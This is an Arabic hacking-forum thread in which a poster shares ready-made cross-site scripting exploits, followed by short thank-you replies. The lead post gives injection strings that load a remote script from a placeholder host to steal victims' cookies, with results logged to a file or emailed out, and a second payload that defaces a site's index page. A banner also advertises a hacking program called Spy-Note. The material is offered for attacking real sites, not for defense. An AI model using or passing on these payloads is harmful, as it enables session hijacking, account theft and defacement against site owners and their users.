1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
  2. الملاحظات
    عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
    إستبعاد الملاحظة
  1. Egy HacKerS
    DeveloPer Plus

    عضو منذ:
    ‏1 ديسمبر 2012
    عدد المشاركات:
    114
    الإعجابات المتلقاة:
    17
    نقاط الجائزة:
    50
    الوظيفة:
    HacKer
    الإقامة:
    Egy
    [​IMG]
    بسم الله الرحمن الرحيم

    احبتي الأعزاء السلام عليكم ورحمة الله وبركاته

    تقبل الله صيامكم وقيامكم صومآ مقبولآ وافطارآ شهيآ

    أسأل الله ان يتقبل منا ومنكم وان يجمعنا بكم في الفردوس الاعلى

    [​IMG]

    درسنا لهذا اليوم بتكلم عن بعض الإستغلالات الجاهزة لثغرات xss

    الإستغلال الأول : Log File For Get Cookies (لجلب الكوكيز)

    تحقن هذا الكود في الحقل المصاب : '

    [CODEE]"--><sc ript src=http://site.tld/cookies/xss.js></sc ript>[/CODEE]

    إمسح الفراغات

    يجب رفع ملفي xss.js & info_mail.php في مجلد cookies

    والنتائج ستظهر في ملف log.html

    [​IMG]

    أو يمكنك وضع إيميلك وستصلك رسالة بكوكيز الضحية


    ملاحظة الرجاء تعديل ملف info_mail.php لان الايميل الافتراضي هو root.sy@hotmail.com

    اذا لم تعدل عليه ستذهب جميع معلومات السحب على الايميل

    الإستغلال الثاني : change index

    تحقن هذا الكود في الحقل المصاب : '

    [CODEE]"--><sc ript src=http://site.tld/index/c_index.js></sc ript>[/CODEE]

    سيتم وضع الإندكس على كامل الصفحة + تغير title الصفحة + صورة في الإندكس

    يمكن تغير لينك الصورة من داخل الملف : c_index.js

    [​IMG]

    [​IMG]
     

    الملفات المرفقة:

    آخر تعديل بواسطة المشرف: ‏25 يونيو 2015
    جاري تحميل الصفحة...
  2. Wolf Hex
    DeveloPer Plus

    عضو منذ:
    ‏24 فبراير 2015
    عدد المشاركات:
    246
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    50
    الوظيفة:
    Student
    الإقامة:
    دولة أمير المؤمنين (ع)
    نظام التشغيل:
    Linux
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    PHP
    Facebook:
    YouTube:
    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    وعليكم السلام ورحمه الله
    ثغرة جميله واستغلال اجمل
    يعطيك العافيه على مجهودك
    لاتحرمنا جديدك
    {1!$7}
     
  3. J3eny
    rank
    Developer

    عضو منذ:
    ‏8 يوليو 2012
    عدد المشاركات:
    11
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الإقامة:
    المدينه المنوره
    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    مبدع من يومك يابطل :ُye@:
     
  4. Resident Evil
    rank
    Developer

    عضو منذ:
    ‏27 ديسمبر 2011
    عدد المشاركات:
    44
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    20
    الإقامة:
    my home
    نظام التشغيل:
    Linux
    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    مشكووور اخوي.... وفقك الله
     
  5. SMART-AL-Falahi
    Developer

    عضو منذ:
    ‏14 فبراير 2015
    عدد المشاركات:
    142
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    الإقامة:
    Oman
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Perl
    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    وعليكم السلام ورحمه اللهمشكور اخي الغال ي طريقه قديم لكنه فعاله

     
  6. سنوكـــر
    rank
    Developer

    عضو منذ:
    ‏18 يوليو 2012
    عدد المشاركات:
    22
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    15
    الإقامة:
    السعوديه - الباحه
    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    :{7}: مشكووووووور أخي :{7}:​
     
  7. before
    rank
    Developer

    عضو منذ:
    ‏12 مارس 2014
    عدد المشاركات:
    16
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    15
    نظام التشغيل:
    windows 7
    Facebook:
    YouTube:
    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    شكرا اخي على الامثلة
     
  8. غاوي هكر
    DeveloPer Plus

    عضو منذ:
    ‏9 يوليو 2015
    عدد المشاركات:
    207
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    50
    الإقامة:
    فلسطين
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    مشكووور يا عسل بوركت
     

مشاركة هذه الصفحة

جاري تحميل الصفحة...